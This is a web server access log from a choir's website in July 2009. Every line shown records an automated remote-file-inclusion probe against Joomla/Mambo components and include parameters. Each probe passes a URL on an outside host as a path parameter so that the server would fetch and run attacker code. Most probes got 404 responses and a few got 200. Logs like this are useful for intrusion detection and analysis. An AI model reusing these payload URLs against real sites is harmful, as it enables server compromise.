67.19.130.218 - - [04/Jul/2009:13:44:41 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:44:41 -0700] "GET /logs/access_090414.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:44:41 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:45:02 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:45:02 -0700] "GET /logs/access_090414.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:45:02 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:45:11 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:45:12 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:11 -0700] "GET /logs/access_090528.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:15 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:15 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:16 -0700] "GET /logs/access_090622.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:24 -0700] "GET /logs/access_090528.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:27 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:27 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:28 -0700] "GET /logs/access_090517.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:32 -0700] "GET /logs/access_090622.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:32 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:46:33 -0700] "GET /include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:46:33 -0700] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:46:33 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:46:33 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:46:39 -0700] "GET /logs/access_090517.log%20%20/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:46:39 -0700] "GET /index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:46:39 -0700] "GET /logs/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:39 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET /logs/access_090517.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET /logs/access_090517.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:40 -0700] "GET /logs/access_090517.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:46:42 -0700] "GET /logs/access.log%20%20//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:46:42 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:46:42 -0700] "GET /include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:46:43 -0700] "GET /logs/access_090626.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
91.121.89.135 - - [04/Jul/2009:13:46:49 -0700] "GET /logs/access_090626.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:53 -0700] "GET /logs/access_090517.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:54 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:46:54 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:47:20 -0700] "GET /logs/access_090528.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:47:21 -0700] "GET /logs/access_090528.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:47:42 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:47:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:47:42 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:47:48 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:47:48 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:47:48 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:47:50 -0700] "GET /logs/access_090620.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:47:53 -0700] "GET /logs/access_090620.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:47:56 -0700] "GET /logs/access_090620.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:47:57 -0700] "GET /logs/access_090620.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:48:02 -0700] "GET /logs/access_090517.log%20%20/index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:48:02 -0700] "GET /index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:48:02 -0700] "GET /logs/index.php?body=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:48:03 -0700] "GET /logs/access_090626.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:48:07 -0700] "GET /logs/access_090620.log%20%20/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:48:18 -0700] "GET /logs/access_090626.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:00 -0700] "GET /logs/access_090409.log//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:00 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:00 -0700] "GET /logs//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 1086 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:02 -0700] "GET /logs/access_090409.log//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:02 -0700] "GET /?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:03 -0700] "GET /logs//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 1086 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:33 -0700] "GET /logs/access_090301.log//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:13:51:35 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
204.9.247.53 - - [04/Jul/2009:13:51:35 -0700] "GET /logs/access_090301.log//?sIncPath=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:52:00 -0700] "GET /logs/access_090626.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.147.206 - - [04/Jul/2009:13:52:00 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:52:28 -0700] "GET /logs/access_090629.log//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:52:52 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:52:58 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:52:58 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:52:59 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:04 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:11 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:15 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:15 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:22 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:23 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:25 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:29 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:13:53:29 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:54:33 -0700] "GET /logs/access_090629.log//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:13:54:44 -0700] "GET /index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:13:54:44 -0700] "GET /logs/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:13:54:44 -0700] "GET /logs/access_090517.log%20%20/index.php?body=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
116.121.201.73 - - [04/Jul/2009:13:55:11 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:22 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:22 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:22 -0700] "GET /logs/access.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:34 -0700] "GET /logs/access_090612.log%20%20/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:35 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:35 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:35 -0700] "GET /logs/access_090626.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:55:39 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:40 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:40 -0700] "GET /logs/access_090626.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:13:55:40 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:56:02 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:56:05 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:56:10 -0700] "GET /logs/access_090629.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:57:24 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:57:50 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:58:07 -0700] "GET ////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:58:07 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:58:08 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:58:19 -0700] "GET /logs/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.19.130.218 - - [04/Jul/2009:13:58:19 -0700] "GET /logs/access.log/////administrator/components/com_virtuemart/virtuemart.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
